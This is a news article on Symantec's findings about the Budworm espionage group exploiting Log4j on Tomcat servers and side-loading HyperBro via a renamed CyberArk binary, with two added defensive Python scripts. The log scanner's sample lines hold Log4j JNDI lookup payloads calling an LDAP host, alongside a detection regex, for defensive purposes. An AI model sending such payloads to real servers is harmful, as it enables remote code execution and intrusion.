Budworm espionage group resurfaces using Log4j vulnerabilities in recent attacks, Symantec reveals


The Chinese espionage group Budworm has launched a series of recent attacks across several continents, including the first confirmed attacks against the U.S. seen in many years, Symantec researchers revealed on Thursday. In these attacks, Budworm exploited the Log4j vulnerabilities to compromise the Apache Tomcat service on servers and install web shells. Additionally, the attackers used Virtual Private Servers (VPS) hosted on Vultr and Telstra as command-and-control (C&C) servers.
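The Log4j entry point described above leaves a trace in the web server's own access logs, because the lookup string has to arrive in some logged request field (URL, User-Agent, or another header). The following is an added example, not code from the article or from Symantec, of a small log checker that percent-decodes each line and flags JNDI lookup strings; the log lines are constructed for the example, and the 198.51.100.0/24 addresses in them are documentation addresses, not indicators from the report.

```python
import re
from urllib.parse import unquote

# Constructed sample Tomcat access-log lines (not taken from the article).
# Line 2 carries the lookup in the User-Agent, line 3 carries it URL-encoded
# in a query parameter, lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2022:10:01:02 +0000] "GET /app/index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Oct/2022:10:01:07 +0000] "GET /app/login HTTP/1.1" 200 301 "-" "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.9 - - [12/Oct/2022:10:01:09 +0000] "GET /app/search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fb%7D HTTP/1.1" 200 88 "-" "curl/7.79"
10.0.0.7 - - [12/Oct/2022:10:02:00 +0000] "GET /manager/html HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

# A Log4j lookup starts with "${" followed by the "jndi:" prefix; match case-insensitively.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, rounds=3):
    """Percent-decode repeatedly (bounded) so single- or double-encoded
    request parameters are compared in their decoded form."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_log(text):
    """Return (line_number, matched_fragment) for every line containing a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        norm = normalize(line)
        m = JNDI_PATTERN.search(norm)
        if m:
            # Keep a short fragment for the analyst; the full line stays in the log.
            hits.append((lineno, norm[m.start():m.start() + 40]))
    return hits


if __name__ == "__main__":
    for lineno, fragment in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {fragment}")
```

The same function can be pointed at a reverse-proxy or WAF log, which is often the only place the raw header values are retained; a hit is a reason to check the host for newly written JSP files under the Tomcat webapps directory, which is where the web shells the article mentions would land.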

“The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a multinational electronics manufacturer, and a U.S. state legislature,” Symantec’s Threat Hunter Team wrote in a company blog post. “The latter attack is the first time in a number of years Symantec has seen Budworm targeting a U.S.-based entity. Along with the above high-value targets, the group also conducted an attack against a hospital in South East Asia.”

The researchers added that Budworm is known for mounting ambitious attacks against high-value targets. “While there were frequent reports of Budworm targeting U.S. organizations six to eight years ago, in more recent years, the group’s activity appears to have been largely focused on Asia, the Middle East, and Europe. However, this is the second time in recent months that Budworm has been linked to attacks against a U.S.-based target.”

Earlier this month, U.S. cybersecurity agencies released a joint Cybersecurity Advisory (CSA) detailing the top Common Vulnerabilities and Exposures (CVEs) used by People’s Republic of China (PRC) state-sponsored cyber hackers since 2020. Among the 20 vulnerabilities the Chinese hackers have exploited since 2020 are flaws in Apache Log4j, Pulse Connect Secure, Atlassian, F5 BIG-IP, VMware vCenter Server, and the Hikvision webserver, along with about three Microsoft remote code execution vulnerabilities.

The researchers said that the main payload continues to be the HyperBro malware family, which is often loaded using a dynamic-link library (DLL) side-loading technique. “This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found. The attacker then runs the legitimate application (having installed it themselves). The legitimate application then loads and executes the payload,” they added.

In recent attacks, Symantec said that Budworm has used the endpoint privilege management software CyberArk Viewfinity to perform side-loading. The binary, which has the default name vf_host[dot]exe, is usually renamed by the attackers to masquerade as a more innocuous file. Masqueraded names included securityhealthservice[dot]exe, secu[dot]exe, vfhost[dot]exe, vxhost[dot]exe, vx[dot]exe, and v[dot]exe, Symantec added.
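The side-loading pattern described in the two paragraphs above has a useful defensive property: renaming a signed, legitimate binary does not change the OriginalFilename stored in its version resource, so a file whose on-disk name disagrees with that field, especially one sitting next to an unsigned DLL, is worth a look. The following is an added example, not code from the article or from Symantec, of that check run over a hypothetical file inventory. The FileRecord fields, the inventory entries and the DLL name vftrace.dll are constructed for the example; a real collector would populate original_filename from the PE VERSIONINFO resource and signed from Authenticode verification. The masquerade names and the vf_host.exe host name are the ones the article reports.

```python
import ntpath  # Windows path handling, so the example runs on any OS
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FileRecord:
    """Hypothetical inventory record for one file on an endpoint."""
    path: str
    original_filename: str  # OriginalFilename from VERSIONINFO, "" if absent
    signed: bool            # True if Authenticode verification succeeded


# Names the article reports Budworm used for the renamed Viewfinity binary.
KNOWN_MASQUERADE_NAMES = {
    "securityhealthservice.exe", "secu.exe", "vfhost.exe",
    "vxhost.exe", "vx.exe", "v.exe",
}

# Legitimate binaries reported as side-load hosts (keyed by OriginalFilename).
SIDELOAD_HOSTS = {"vf_host.exe"}


def find_sideload_candidates(records):
    """Return (path, reasons) for executables that look renamed, match a
    reported masquerade name, or are known side-load hosts; an unsigned DLL
    in the same directory is recorded as an additional reason."""
    by_dir = defaultdict(list)
    for r in records:
        by_dir[ntpath.dirname(r.path).lower()].append(r)

    findings = []
    for r in records:
        name = ntpath.basename(r.path).lower()
        if not name.endswith(".exe"):
            continue
        reasons = []
        orig = r.original_filename.lower()
        if orig and orig != name:
            reasons.append(f"on-disk name differs from OriginalFilename {r.original_filename}")
        if orig in SIDELOAD_HOSTS:
            reasons.append("OriginalFilename is a known side-load host")
        if name in KNOWN_MASQUERADE_NAMES:
            reasons.append("name matches a reported masquerade name")
        # Unsigned DLLs beside the executable are the payload carriers in this technique.
        unsigned_dlls = [
            ntpath.basename(s.path)
            for s in by_dir[ntpath.dirname(r.path).lower()]
            if s is not r and s.path.lower().endswith(".dll") and not s.signed
        ]
        if reasons and unsigned_dlls:
            reasons.append("unsigned DLL(s) alongside: " + ", ".join(unsigned_dlls))
        if reasons:
            findings.append((r.path, reasons))
    return findings


# Constructed inventory (not from the article). The renamed host is still
# validly signed, because renaming does not invalidate an Authenticode signature.
SAMPLE_INVENTORY = [
    FileRecord(r"C:\Program Files\Vendor\vendor.exe", "vendor.exe", True),
    FileRecord(r"C:\Program Files\Vendor\helper.dll", "helper.dll", True),
    FileRecord(r"C:\Users\Public\Libraries\secu.exe", "vf_host.exe", True),
    FileRecord(r"C:\Users\Public\Libraries\vftrace.dll", "", False),  # hypothetical DLL name
    FileRecord(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE", True),
]


if __name__ == "__main__":
    for path, reasons in find_sideload_candidates(SAMPLE_INVENTORY):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

The OriginalFilename comparison is what makes this check survive the attackers' renaming, which is exactly the step the article says they take; the fixed list of reported names only catches the variants already published, so it is kept as a secondary signal rather than the primary one.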

The researchers said that, in some cases, the HyperBro backdoor was loaded by dedicated HyperBro loaders, such as peloader[dot]exe and 12[dot]exe, which are designed to load malicious DLLs and encrypt payloads. “While HyperBro was frequently used, the attackers also used the PlugX/Korplug Trojan as a payload at times,” they added.

Some of the other tools used in recent attacks include Cobalt Strike, an off-the-shelf tool that can be used to load shellcode onto victim machines. It has legitimate uses as a penetration testing tool but is frequently abused by malicious actors. The researchers also identified use of LaZagne, a publicly available credential dumping tool, and IOX, a publicly available proxy and port-forwarding tool. The attackers also used the Fast Reverse Proxy (FRP) tool and Fscan, a publicly available intranet scanning tool.

In another cybersecurity advisory, U.S. cybersecurity agencies disclosed the use of Impacket and an exfiltration tool to steal sensitive information from a defense industrial base (DIB) organization. Additionally, from November last year through January, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a DIB sector organization’s enterprise network. The advisory, however, did not clarify why the information was being released only after several months.

Commenting on the Budworm group, Roger Grimes, data-driven defense evangelist at KnowBe4, wrote in an emailed statement that this is the current state of affairs: every sufficiently capable nation is committing unauthorized actions against its adversaries. “What’s changed in the last decade is how these nation-state actions are in both quantity, impact, and number of targets.”

Grimes said that in the past, most nation-state actors compromised targets associated with their adversary’s government and military. “Now, today, the most common nation-state target is traditional organizations not directly aligned with governments or the military, although certainly governments and militaries are still greatly targeted,” he added.

“Cyberattacks originating from nation states have many distinguishing features from those of run-of-the-mill cybercrime groups,” Chris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, wrote in an emailed statement. “First, their attacks are usually more strategic in nature, picking specific targets and information as objectives. Second, because the goals of nation-state actors align more with traditional espionage objectives like data theft or sabotage, those threat actors take more care to avoid detection to conceal their presence for as long as possible.” 
